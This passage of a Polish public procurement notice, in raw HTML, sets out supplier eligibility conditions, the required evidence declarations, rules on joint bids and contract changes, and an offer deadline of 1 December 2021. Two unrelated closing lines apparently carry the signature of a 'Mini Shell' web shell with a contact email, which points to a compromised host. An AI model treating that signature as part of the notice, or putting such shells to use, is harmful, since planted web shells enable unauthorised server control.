podlegają <br/> wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają <br/> określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/> dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/><br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/> <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/> zawodowej, o ile wynika to z odrębnych przepisów:<br/> <br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3) sytuacji ekonomicznej lub finansowej: <br/><br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/><br/>4) zdolności technicznej lub zawodowej: <br/><br/> Wykonawca spełni warunek, jeżeli wykaże wykaz dostaw wykonanych, a w <br/> przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w <br/> okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/> okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na <br/> rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem <br/> dowodów określających czy te dostawy zostały wykonane lub są wykonywane <br/> należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/> dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały <br/> wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są <br/> wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w <br/> stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku <br/> świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź <br/> inne dokumenty potwierdzające ich należyte wykonywanie powinny być <br/> wystawione w okresie ostatnich 3 miesięcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">. Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują: <br/>1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z <br/> innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/> dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do <br/> tej samej grupy kapitałowej wraz z dokumentami lub informacjami <br/> potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/> dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy <br/> należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ; <br/>2) Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub <br/> ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres <br/> prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/> wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy <br/> zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających <br/> czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym <br/> dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/> przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku <br/> świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z <br/> przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów <br/> – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub <br/> ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/> należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. – <br/> załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert <br/> oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku <br/> podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ; <br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne <br/> potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki <br/> udziału w postępowaniu. <br/>3. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do <br/> złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, <br/> podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o <br/> zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia <br/> podmiotowych środków dowodowych. <br/>4. Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują: <br/>1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z <br/> innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/> dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do <br/> tej samej grupy kapitałowej wraz z dokumentami lub informacjami <br/> potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/> dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy <br/> należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ; <br/>2) Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub <br/> ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres <br/> prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/> wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy <br/> zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających <br/> czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym <br/> dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/> przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku <br/> świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z <br/> przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów <br/> – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub <br/> ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/> należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. – <br/> załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim <br/> przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w <br/> postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia <br/> publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/> oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z <br/> Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz <br/> spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje <br/> spełnianie warunków udziału w postępowaniu. <br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/> oświadczenie, z którego wynika, które dostawy/usługi wykonają poszczególni <br/> Wykonawcy. <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z <br/> postępowania składa każdy z Wykonawców wspólnie ubiegających się o <br/> zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści <br/> wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w <br/> Projektowanych postanowieniach umowy, stanowiących Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/dpskombatant</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-01 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com